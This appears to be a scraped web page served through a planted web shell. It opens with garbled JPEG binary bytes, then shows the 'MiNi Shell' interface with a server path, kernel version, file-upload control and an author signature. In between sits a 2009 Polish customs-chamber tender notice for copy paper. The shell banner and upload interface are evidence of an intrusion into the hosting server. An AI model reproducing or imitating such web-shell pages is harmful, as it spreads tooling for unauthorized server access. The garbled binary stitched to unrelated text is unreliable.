JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090505/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090505/70223-N-2009.html

<p class="kh_header"><b>Poznań: dostawa papieru kserograficznego i składanki komputerowej</b><br>
<b>Numer ogłoszenia: 70223 - 2009; data zamieszczenia: 05.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Poznaniu , ul. Krańcowa 28, 61-037 Poznań, woj. wielkopolskie, tel. 061 6583500, 6583527,28, faks 061 6583518.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poznan.ic.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa papieru kserograficznego i składanki komputerowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa w trzech transzach: 1.papieru kserograficznego klasy B o parametrach nie gorszych niż: gramatura 80+/-3; białość CIE 160+/-2,5. a) format A4 w ilości 8 500 ryz - 500 kartek w ryzie (pierwsza transza - 2500 ryz; druga transza - 3000 ryz; trzecia transza -3000 ryz) b) format A3 w ilości 40 ryz - 500 kartek w ryzie ( pierwsza transza - 40 ryz) 2. Składanki komputerowej z perforacją a) format 240 1+1 (900 składek) w ilości 5 kartonów (pierwsza transza - 5 kart.) b) format 240 1+2 (600 składek) w ilości 8 kartonów (pierwsza transza 8 kart.) Kod przedmiotu zamówienia wg Wspólnego Słownika Zamówień: 30.19.76.44-2 Papier kserograficzny.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Do udziału w licytacji elektronicznej dopuszczeni będą wykonawcy którzy spełniają warunki określone w art. 22 ust. 1 pzp 2.Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie oświadczenia Wykonawcy i dokumentów określonych poniżej. 3.Wszyscy Wykonawcy spełniający warunki określone powyżej zostaną zaproszeni przez Zamawiającego do udziału w licytacji elektronicznej i do składania ofert. 4.Informacja o dopuszczeniu do udziału w licytacji elektronicznej przekazana zostanie wykonawcom przez Zamawiającego na podany we wniosku o dopuszczenie do udziału w postępowaniu numer faksu lub adres e-mail..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków, o których mowa powyżej, wykonawcy składają, wraz z wnioskiem o dopuszczenie do udziału w licytacji (załącznik nr 1 do ogłoszenia- wzór dostępny na stronie www.poznan.ic.gov.pl/bip/), następujące dokumenty: 1.Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 p.z.p. (załącznik nr nr 3 do ogłoszenia -wzór dostępny na stronie www.poznan.ic.gov.pl/bip/), 2.Aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://licytacje.uzp.gov.pl</p>
<p><b>IV.3.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.poznan.ic.gov.pl/bip/</p>
<p><b>IV.3.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1.Wymagania formalne: 1.1. Z platformy mogą korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod adresem http://licytacje.uzp.gov.pl. 1.2 Wykonawca, aby umożliwić Zamawiającemu dopuszczenie go do udziału w licytacji, musi zarejestrować się w systemie dostępnym na stronie http://licytacje.uzp.gov.pl, a wraz z ww. wnioskiem winien przekazać Zamawiającemu informację o swoim loginie. 1.3. W przypadku podania przez Wykonawcę niewłaściwego loginu bądź nie przekazania go Zamawiającemu wraz z wnioskiem, Wykonawca zobowiązany jest do jego przekazania najpóźniej jeden dzień przed terminem otwarcia licytacji. 2.Wymagania techniczne: Komputer klasy PC (lub równoważnej) spełniający wymogi techniczne określone przez producentów przeglądarek internetowych Ms Internet Explorer w wersji 6.0 lub wyższej albo Mozilla Firefox w wersji 2.0 lub wyższej, z zainstalowaną jedną z w/w przeglądarek lub przeglądarką równoważną, podłączony do sieci Internet..</p>
<p><b>IV.3.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1.Licytacja elektroniczna na dostawę papieru kserograficznego będzie licytacją jednoetapową. 2.W toku licytacji elektronicznej wykonawcy składają kolejne korzystniejsze postąpienia. Możliwość złożenia postąpienia istnieje od otwarcia licytacji do jej zamknięcia. 3.W toku licytacji Wykonawcy proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach; grosze należy oddzielić od złotych kropką. 4.Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. 5.Zamawiający przyjął za minimalne postąpienie wartość 200 zł. 6.W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych ofert, z tym że do momentu zamknięcia licytacji nie ujawni informacji umożliwiających identyfikację Wykonawców. 7.Zamawiający określił kwotę wywoławczą - 96 932,00 zł brutto. 8.Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto. 9.Kryterium oceny ofert jest najniższa cena. 10.Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza przed podpisaniem umowy wypełni Formularz cenowy, stanowiący Załącznik nr 2 do niniejszego ogłoszenia poprzez wpisanie do niego cen jednostkowych, wartości oferowanego asortymentu i wartość całego przedmiotu umowy w złotych polskich. Wypełniony i podpisany przez Wykonawcę formularz stanowić będzie załącznik do umowy pomiędzy stronami. Suma wartości oferowanego asortymentu, tzn. wartość przedmiotu umowy brutto musi być tożsamy z ceną najkorzystniejszej oferty tego Wykonawcy..</p>
<p><b>IV.3.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li>
<table>
<tr><td style="font-size: 10pt;"><b>etap nr</b></td><td width="20px;"><td style="font-size: 10pt;"><b>czas trwania etapu</b></td></tr>
<tr><td valign="top" style="font-size: 10pt;">1</td><td></td><td style="font-size: 10pt;">licytacja jest jednoetapowa i zostanie zakończona po upływie 30 minut od jej otwarcia</td></tr>
</table></li></ul>
<p><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną <i>zakwalifikowani</i> do następnego etapu?</b> nie.</p>
<p><b>IV.3.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 13.05.2009 godzina 09:00, miejsce: Wnioski należy składać w Biurze Podawczym - pok. 132 Izby Celnej w Poznaniu; ul. Krańcowa 28..</p>
<p><b>IV.3.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni po terminie przekazania zaproszeń, o godzinie 10:00..</p>
<p><b>Termin zamknięcia licytacji elektronicznej:</b> Upływa w dniu otwarcia, o godzinie 10:30..</p>
<p><b>Warunki zamknięcia licytacji elektronicznej:</b> 30 minut od otwarcia licytacji.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> CENA : Wykonawca w ofercie podaje cenę brutto za całość zamówienia. OPIS SPOSOBU POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI WRAZ ZE WSKAZANIEM PRZEZ ZAMAWIAJĄCEGO OSÓB UPRAWNIONYCH DO KONTAKTÓW 1.Wszelkiego rodzaju oświadczenia, wnioski, zawiadomienia, informacje itp. Zamawiający i Wykonawcy przekazują drogą elektroniczną lub faksem do momentu otwarcia licytacji. Zgodnie z art. 27 ust. 3 ustawy pzp zawsze dopuszczalna jest forma pisemna. 2.Od momentu otwarcia do momentu zamknięcia licytacji Zamawiający i Wykonawcy wszelkiego rodzaju wnioski, oświadczenia i inne informacje przekazują drogą elektroniczną za pośrednictwem platformy licytacyjnej; wiadomości przekazane wykonawcom będą widoczne w zakładce moje wiadomości. 3.Osobą uprawnioną do kontaktu z Wykonawcami są: - w sprawach dotyczących przedmiotu zamówienia - Patryk Kłoda - tel. /061/ 658 35 33, fax (061) 658 35 21, 658 35 18; e-mail: patryk.kloda@poz.mofnet.gov.pl - w sprawach dotyczących procedury postępowania: - Aurelia Król - tel. /061/ 658 35 27, fax (061) 658 35 21, 658 35 18; e-mail: aurelia.krol@poz.mofnet.gov.pl; Joanna Nochowicz - tel. /061/ 658 35 28, fax (061) 658 35 21, 658 35 18; e-mail: joanna.nochowicz@poz.mofnet.gov.pl 4.Adres strony internetowej zamawiającego : http://www.poznan.ic.gov.pl 5.Adres strony na której będzie prowadzona licytacja elektroniczna: http://licytacje.uzp.gov.pl SPOSÓB PRZYGOTOWANIA I TERMIN SKŁADANIA WNIOSKÓW O DOPUSZCZENIE DO UDZIAŁU W LICYTACJI ELEKTRONICZNEJ 1.Wniosek o dopuszczenie do licytacji wraz z dokumentami i oświadczeniami wymienionymi w pkt. VII musi być przygotowany w języku polskim, w formie pisemnej, na formularzu stanowiącym załącznik nr 1 do ogłoszenia wzór dostępny na stronie www.poznan.ic.gov.pl/bip/. Dokumenty muszą być podpisane przez osoby upoważnione do reprezentowania Wykonawcy. 2.Składane zaświadczenia i oświadczenia muszą być oryginalnymi dokumentami lub kserokopiami poświadczonymi za zgodność z oryginałem przez upoważnioną osobę na każdej zapisanej stronie kserokopii poświadczanego dokumentu. Upoważniona osoba jest to osoba wskazana w dokumencie upoważniającym do występowania w obrocie prawnym lub posiadająca pełnomocnictwo załączone do oferty. W przypadku, gdy wykonawcę reprezentuje pełnomocnik - to pełnomocnictwo powinno być podpisane przez osoby reprezentujące osobę prawną lub fizyczną. Pełnomocnictwo musi być złożone w formie oryginału bądź odpisu poświadczonego za zgodność z oryginałem przez notariusza. 3.Wniosek o dopuszczenie do udziału w licytacji należy złożyć w kopercie zawierającej wszystkie wymagane w ogłoszeniu dokumenty. 4.Koperta musi być dostarczona do Zamawiającego na adres: Izba Celna w Poznaniu, ul. Krańcowa 28, 61-037 Poznań i opatrzona napisem: Wniosek o dopuszczenie do udziału w licytacji elektronicznej na dostawę papieru kserograficznego - nie otwierać przed 13.05.2009 r. 5.Wnioski należy składać do dnia 13.05.2009 r. do godz. 9:00 w Biurze Podawczym - pok. 132 Izby Celnej w Poznaniu; ul. Krańcowa 28. 

Istotne dla stron postanowienia umowy, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy, jeżeli zamawiający wymaja od wykonawcy, aby zawarł z nim umowę w sprawie zaówienia publicznego na takich warunkach.

1.Cena obejmuje wszelkie koszty związane z realizacją zamówienia w tym, koszty dostawy i rozładunku towaru w magazynie Zamawiającego: a) zlokalizowanym, pod adresem: ul. Krańcowa 28; 61-037 Poznań - dostawa pierwszej transzy. b)mieszczącym się w Centrum Magazynowym BUGAJ oraz ul. Kobylnicka 52, 62-007 Biskupice - dostawa drugiej i trzeciej transzy. 2.Ceny pozostają niezmienne przez cały okres trwania umowy. 3.Dostawy towaru przyjmowane będą w godz. od 10.00 do 13.00. 4.Towar będzie dostarczony na paletach. 5.Pierwsza transza zamówienia zostanie zrealizowana w terminie 7 dni od daty podpisania umowy. 6.Druga i trzecia transza zamówienia zostanie zrealizowana w terminie 7 dni od daty przesłania zlecenia przez Zamawiającego. Przewidywany termin dostawy drugiej i trzeciej transzy to czwarty kwartał 2009 r. 7.O terminie dostawy wykonawca zobowiązany jest poinformować Zamawiającego przynajmniej 24 godziny przed terminem dostawy. 8.Wadliwy towar będzie reklamowany i wymieniany na wolny od wad. 9.W przypadku ujawnienia wad jakościowych po przyjęciu towaru, Wykonawca zobowiązany jest do wymiany towaru na własny koszt na towar na wolny od wad w terminie 7 dni od daty zgłoszenia reklamacji faxem lub pocztą elektroniczną. 10.Kara umowna w przypadku niedostarczenia towaru w terminie określonym w pkt. 9 wynosić będzie 2% wartości niezrealizowanej dostawy obliczonej wg cen podanych w ofercie za każdy dzień zwłoki. 11.Kara umowna w przypadku niedostarczenia towaru w terminie określonym w pkt. 5 wynosić będzie 2% wartości niezrealizowanej dostawy obliczonej wg cen podanych w ofercie za każdy dzień zwłoki. 12.Kara umowna w przypadku niedostarczenia towaru w terminie określonym w pkt. 6 wynosić będzie 2% wartości niezrealizowanej dostawy obliczonej wg cen podanych w ofercie za każdy dzień zwłoki. 13.Kary umowne Zamawiający może potrącić z bieżących należności Wykonawcy. 14.Płatność nastąpi w terminie 21 dni od daty otrzymania faktury VAT
INFORMACJE DOTYCZĄCE ZABEZPIECZENIA NALEŻYTEGO WYKONANIA UMOWY

Creat By MiNi SheLL
Email: jattceo@gmail.com